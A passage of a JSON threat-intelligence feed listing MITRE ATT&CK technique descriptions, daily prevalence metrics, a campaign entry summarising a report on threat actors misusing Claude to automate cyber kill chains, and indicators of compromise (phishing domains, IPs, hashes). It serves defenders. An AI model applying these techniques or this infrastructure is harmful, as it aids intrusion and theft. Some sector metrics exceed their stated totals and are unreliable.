exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", "created_on": "2020-11-20T22:08:25.000Z", "name": "PowerShell"}, {"id": "bdc973f6-7ba7-4201-82f4-29ce351739e8", "category": "trellix-tool", "description": "The Remove-Item cmdlet in PowerShell is used to delete one or more items permanently. It's a versatile command that isn't limited to just files and folders; it can also remove other types of objects such as registry keys, variables, functions, and aliases. Because it deletes items from various data stores, it acts as a universal deletion command within PowerShell. By default, the items are deleted without confirmation, so it should be used with care.", "created_on": "2025-10-11T00:14:30.000Z", "name": "Remove-Item"}, {"id": "df1c88c4-9cae-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-23T04:35:46.000Z", "name": "Retail"}, {"id": "bea4602e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Scheduled Task"}, {"id": "e8f34936-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ", "created_on": "2020-11-20T22:08:24.000Z", "name": "Spearphishing Attachment"}, {"id": "3c5609a5-3683-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", "created_on": "2020-12-04T22:51:24.000Z", "name": "System Checks"}, {"id": "c459d94f-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)", "created_on": "2020-02-26T13:49:11.000Z", "name": "System Owner/User Discovery"}, {"id": "24603da9-9c82-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-22T23:15:35.000Z", "name": "Trade"}, {"id": "c4141d2a-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", "created_on": "2020-02-26T13:49:10.000Z", "name": "Web Service"}], "metrics": [{"date": "2026-09-10", "nodes": 0.94, "events": 19.99, "sectors": [{"sector": "Various", "affected": 7.88, "events": 168.09, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.14, "events": 50.28, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 4.15, "total": 1000000}, {"iso_code": "TR", "affected": 9.6, "events": 288.06, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-11", "nodes": 0.47, "events": 4.76, "sectors": [{"sector": "Various", "affected": 3.79, "events": 38.5, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.34, "events": 13.11, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 57.61, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 1.02, "events": 18.58, "sectors": [{"sector": "Unknown", "affected": 5.25, "events": 41.37, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 125000, "events": 4500000, "total": 1000000}, {"sector": "Government", "affected": 1.64, "events": 57.16, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.6, "events": 13.11, "total": 1000000}, {"iso_code": "IN", "affected": 1.67, "events": 11.66, "total": 1000000}, {"iso_code": "TR", "affected": 28.81, "events": 873.79, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 0.23, "events": 5.23, "sectors": [{"sector": "Various", "affected": 1.97, "events": 43.99, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.8, "events": 17.92, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 0.39, "events": 4.53, "sectors": [{"sector": "Unknown", "affected": 3.28, "events": 38.08, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.07, "events": 14.71, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 14.4, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 0.47, "events": 7.26, "sectors": [{"sector": "Various", "affected": 3.94, "events": 61.06, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.34, "events": 12.04, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 230.45, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 0.31, "events": 3.12, "sectors": [{"sector": "Unknown", "affected": 2.63, "events": 26.26, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.53, "events": 9.63, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 14.4, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "a49ef3d9-e251-4e09-9157-c9bf415b29cd", "threat_level_id": 2, "description": "Between December 2025 and August 2026, Anthropic's Threat Intelligence team identified and disrupted operations in which threat actors misused Claude across seven harm areas: cyber operations, influence operations, surveillance, conventional weapons development, biological misuse, scams and fraud, and illicit distillation. Threat actors included suspected state-sponsored groups from Russia, China, and Iran, commercially motivated criminals, spyware vendors, and politically motivated individuals. Claude was used to automate cyber kill chains, generate propaganda content, build surveillance platforms, develop weapons guidance software, plan gain-of-function research, and conduct large-scale model distillation attacks. AI enabled individual operators to sustain multi-victim campaigns that previously required skilled teams. In cyber operations, AI collapsed the labor gap separating state-sponsored operations from individual actors, with autonomous workflows conducting reconnaissance, exploitation, and data exfiltration. The most sophisticated cases involved AI frameworks executing entire attack chains with minimal human oversight, fundamentally inverting defensive costs by enabling rapid bypasses of traditional security detections.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Anthropic and shared publicly https://www-cdn.anthropic.com/e50be2e51e7695dc4b1366a37a245a597377d3b5/Anthropic-Detecting-and-countering-091026.pdf", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://www-cdn.anthropic.com/e50be2e51e7695dc4b1366a37a245a597377d3b5/Anthropic-Detecting-and-countering-091026.pdf"]}, "is_coat": 0, "name": "Anthropic Disrupts Multiple Threat Actors Attempting To Leverage Claude To Carry Out Attacks", "prevalence": {"countries": [{"iso_code": "US", "affected": 23.54, "events": 317.21, "total": 1000000}, {"iso_code": "TR", "affected": 129.63, "events": 148.83, "total": 1000000}, {"iso_code": "IN", "affected": 28.33, "events": 74.99, "total": 1000000}, {"iso_code": "ES", "affected": 48.93, "events": 48.93, "total": 1000000}, {"iso_code": "IL", "affected": 280.74, "events": 311.93, "total": 1000000}, {"iso_code": "AT", "affected": 21.88, "events": 98.45, "total": 1000000}, {"iso_code": "IT", "affected": 6.72, "events": 13.44, "total": 1000000}, {"iso_code": "TH", "affected": 32.4, "events": 32.4, "total": 1000000}, {"iso_code": "CH", "affected": 10.13, "events": 10.13, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 6.49, "total": 1000000}, {"iso_code": "HR", "affected": 62.52, "events": 62.52, "total": 1000000}, {"iso_code": "NL", "affected": 8.08, "events": 8.08, "total": 1000000}, {"iso_code": "PE", "affected": 26.02, "events": 26.02, "total": 1000000}, {"iso_code": "UA", "affected": 36.11, "events": 36.11, "total": 1000000}], "events": 102.52, "nodes": 12.81, "sectors": [{"sector": "Unknown", "affected": 65.66, "events": 816.17, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 1250000, "events": 1250000, "total": 1000000}, {"sector": "Government", "affected": 7.4, "events": 7.4, "total": 1000000}, {"sector": "Outsourcing & Hosting", "affected": 8.76, "events": 12.65, "total": 1000000}, {"sector": "Process Manufacturing", "affected": 122.91, "events": 136.57, "total": 1000000}, {"sector": "Retail", "affected": 77.99, "events": 77.99, "total": 1000000}, {"sector": "Education", "affected": 24.37, "events": 24.37, "total": 1000000}, {"sector": "Software", "affected": 9.07, "events": 18.14, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "domain", "value": "ms365-live.com"}, {"type": "hostname", "value": "teams.ms365-live.com"}, {"type": "domain", "value": "m365-owa.com"}, {"type": "domain", "value": "owa-ms365.com"}, {"type": "domain", "value": "ms365-device.com"}, {"type": "hostname", "value": "mslivetest.duckdns.org"}, {"type": "domain", "value": "my-invite.org"}, {"type": "domain", "value": "chamber-ua.org"}, {"type": "domain", "value": "chathamhouse.eu"}, {"type": "domain", "value": "ukrinform-share.net"}, {"type": "ip", "value": "104.145.210.184"}, {"type": "ip", "value": "31.57.243.154"}, {"type": "domain", "value": "statistic-ms.live"}, {"type": "domain", "value": "static-ms.live"}, {"type": "ip", "value": "104.194.151.133"}, {"type": "domain", "value": "ad-g.org"}, {"type": "ip", "value": "104.194.159.55"}, {"type": "domain", "value": "docs-viewer.org"}, {"type": "ip", "value": "144.172.114.192"}, {"type": "domain", "value": "wa-connect.eu"}, {"type": "domain", "value": "mygreatmarket.org"}, {"type": "domain", "value": "mygreatmarket.com"}, {"type": "ip", "value": "213.145.86.112"}, {"type": "ip", "value": "2.26.53.194"}, {"type": "domain", "value": "cdncounter.net"}, {"type": "hostname", "value": "static.cdncounter.net"}, {"type": "domain", "value": "stuseamandesilt.org"}, {"type": "hostname", "value": "api.stuseamandesilt.org"}, {"type": "hostname", "value": "cdn.stuseamandesilt.org"}, {"type": "hostname", "value": "update.stuseamandesilt.org"}, {"type": "domain", "value": "itechx.tel"}, {"type": "hostname", "value": "pdfviewer2024.b-cdn.net"}, {"type": "domain", "value": "meridian-protocol.org"}, {"type": "domain", "value": "meridiangroup-corp.com"}, {"type": "domain", "value": "projectnightcrawler.dev"}, {"type": "domain", "value": "metricwave.org"}, {"type": "domain", "value": "mgsend.org"}, {"type": "ip", "value": "148.135.195.111"}, {"type": "ip", "value": "185.198.234.26"}, {"type": "ip", "value": "185.198.234.101"}, {"type": "ip", "value": "149.54.42.106"}, {"type": "ip", "value": "104.194.149.228"}, {"type": "ip", "value": "38.146.28.132"}, {"type": "ip", "value": "38.146.28.75"}, {"type": "domain", "value": "wa-meeting.com"}, {"type": "domain", "value": "russianearabroad.com"}, {"type": "domain", "value": "russianearabroad.org"}, {"type": "email", "value": "anna.manager@russianearabroad.net"}, {"type": "email", "value": "events@embassy-protocol.int"}, {"type": "hostname", "value": "updatebeacon.duckdns.org"}, {"type": "hostname", "value": "esvfecawvjmchjslqyemho2fiduc59wzn.oast.fun"}, {"type": "hostname", "value": "soraki-proxy.20245aad98d27b1b1a2f0f103e1d7ee0.workers.dev"}, {"type": "domain", "value": "soraki.cc"}, {"type": "domain", "value": "soraki.work"}, {"type": "domain", "value": "policenationale.cc"}, {"type": "domain", "value": "emailsecure.email"}, {"type": "domain", "value": "mozilla.ws"}, {"type": "domain", "value": "signin-1psswoord.com"}, {"type": "domain", "value": "on-pssword.com"}, {"type": "domain", "value": "ari-chain.com"}, {"type": "domain", "value": "arichain.network"}, {"type": "domain", "value": "bitmart-mystery.com"}, {"type": "domain", "value": "defi-claim.xyz"}, {"type": "domain", "value": "service-infos.info"}, {"type": "domain", "value": "0x0.st"}, {"type": "email", "value": "fuckyoubasil@s3.ap-tokyo.megas4.com"}, {"type": "url", "value": "https://s3.eu-central-1.s4.mega.io/fuckyoubasil/"}, {"type": "url", "value": "https://s3.ap-tokyo.megas4.com"}, {"type": "ip", "value": "162.128.129.106"}, {"type": "ip", "value": "195.178.110.131"}, {"type": "ip", "value": "45.148.10.242"}, {"type": "ip", "value": "92.118.39.3"}, {"type": "ip", "value": "185.65.134.246"}, {"type": "ip", "value": "185.65.134.199"}, {"type": "ip", "value": "193.32.249.161"}, {"type": "ip", "value": "193.32.249.164"}, {"type": "ip", "value": "193.32.249.170"}, {"type": "ip", "value": "104.36.50.54"}, {"type": "ip", "value": "104.193.135.207"}, {"type": "ip", "value": "91.171.138.169"}, {"type": "ip", "value": "176.177.12.62"}, {"type": "domain", "value": "awstore.cloud"}, {"type": "domain", "value": "kiro.cheap"}, {"type": "domain", "value": "sys-tools.cfd"}, {"type": "domain", "value": "aws-us-east-3.com"}, {"type": "domain", "value": "holdboost.store"}, {"type": "domain", "value": "deltaclient.xyz"}, {"type": "hostname", "value": "iymkjuzymkapovrntoxy.supabase.co"}, {"type": "domain", "value": "heyhru.com"}, {"type": "domain", "value": "archat.us"}, {"type": "hostname", "value": "file.archat.us"}, {"type": "domain", "value": "sitin.ai"}, {"type": "ip", "value": "38.129.138.244"}, {"type": "hostname", "value": "managedkafka.heyhru-server.cloud.goog"}, {"type": "sha256", "value": "be99857449d2856dd5a84e21c8a3d5e0e01456adb44062ddec5a6b4970d8d42d"}, {"type": "sha256", "value": "918fa52ae45ed60ba7cc8bdc99c3cbe9ab92e0375ec31fc05d0d4513be11c593"}, {"type": "md5", "value": "fba867df17721879df9d8dcca68d6900"}, {"type": "sha1", "value": "510af9bb00ff5d4a6856b1291af55db9f6e13551"}], "galaxies": [{"id": "ff3dd1aa-8db1-4764-83dc-8765cb9fd7f9", "category": "trellix-tool", "description": "0x0.st is a legitimate ephemeral file-sharing and paste service, commonly known as The Null Pointer, that lets anyone upload a file from the command line and receive a short URL. In the operations documented by Anthropic it was abused by a ShinyHunters-affiliated actor as an exfiltration endpoint, with stolen data pushed to it via curl, making it an example of a benign public utility repurposed for data theft.", "created_on": "2026-09-12T00:12:32.000Z", "name": "0x0.st"}, {"id": "c3d21935-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.", "created_on": "2020-02-26T13:49:10.000Z", "name": "Access Token Manipulation"}, {"id": "d6a5747d-5bf7-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", "created_on": "2021-01-21T14:49:18.000Z", "name": "Adversary-in-the-Middle"}, {"id": "c11625b4-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:25:55.000Z", "name": "Aerospace"}, {"id": "b54f1541-3f81-46b3-87ec-cf86b974ef4c", "category": "mitre-attack-pattern", "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim\u2019s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured \u2013 for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user\u2019s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.", "created_on": "2022-01-29T06:14:22.000Z", "name": "Application Access Token"}, {"id": "f9ffa985-67e5-11eb-9477-02d538d9640e", "category": "trellix-threat-actor", "description": "APT29 aka the Dukes or Cozy Bear are a dedicated and well-organized state sponsored cyber-espionage group. The group is operating since 2008 and most likely conducting cyber-operations for Russia's FSB (Federal Security Service) and the SVR (Foreign Intelligence Service). \r\n\r\nThe group's main objective is to collect intelligence from Western governments and their interacting organizations. One of their 'famous' attacks was the attack on the US Democratic National Committee in 2015. Political think-tanks, Government Ministries and political organizations that could threaten the Russian Federation are targeted to collect information from to assist in foreign and security political decision making. \r\n\r\nThe well-sourced group is using an arsenal of malware-families and toolkits to compromise their victims. Examples are CloudDuke, CosmicDuke, CozyDuke, HammerDuke but also COTS implementations of CobaltStrike and Mimikatz.\r\n\r\nMany of their campaigns align with political or foreign affair events that are of interest of the Russian Federation. For example, elections in certain countries are of high interest and activity towards Covid-19 research labs have been observed.", "created_on": "2021-02-05T19:11:40.000Z", "name": "APT29"}, {"id": "87df7cd8-a378-4c40-a671-3cfd1307cab8", "category": "mitre-attack-pattern", "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\n", "created_on": "2024-06-27T21:12:25.000Z", "name": "Artificial Intelligence"}, {"id": "68deefce-77ad-4ca0-8da0-170cf90db22f", "category": "trellix-tool", "description": "AWS SES, or Amazon Simple Email Service, is a cloud-based email service for sending and receiving marketing, notification, and transactional emails.", "created_on": "2025-11-01T00:14:59.000Z", "name": "AWS SES"}, {"id": "b5ece41b-1dfa-4ff1-95ec-db9f5965d228", "category": "country", "description": "Bangladesh", "created_on": "2022-05-11T21:15:33.000Z", "name": "bangladesh"}, {"id": "314a49dc-5f8a-418b-9e6d-a70cf19dcfff", "category": "trellix-tool", "description": "BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.\r\n\r\nAmid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.", "created_on": "2024-02-09T22:14:02.000Z", "name": "BeEF"}, {"id": "bebe798e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Bidirectional Communication"}, {"id": "9dbf3a19-e1bf-11ea-9477-02d538d9640e", "category": "country", "description": "Brazil", "created_on": "2020-08-19T01:59:28.000Z", "name": "brazil"}, {"id": "4d1a98c3-20bc-4e29-bb62-b92fda0e383e", "category": "country", "description": "Central African Republic", "created_on": "2022-04-14T21:15:42.000Z", "name": "central african republic"}, {"id": "1eaf4b18-d1e9-11ea-9477-02d538d9640e", "category": "country", "description": "China", "created_on": "2020-07-29T22:16:16.000Z", "name": "china"}, {"id": "5dc0c449-6c15-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)", "created_on": "2021-02-11T03:00:58.000Z", "name": "Cloud Account"}, {"id": 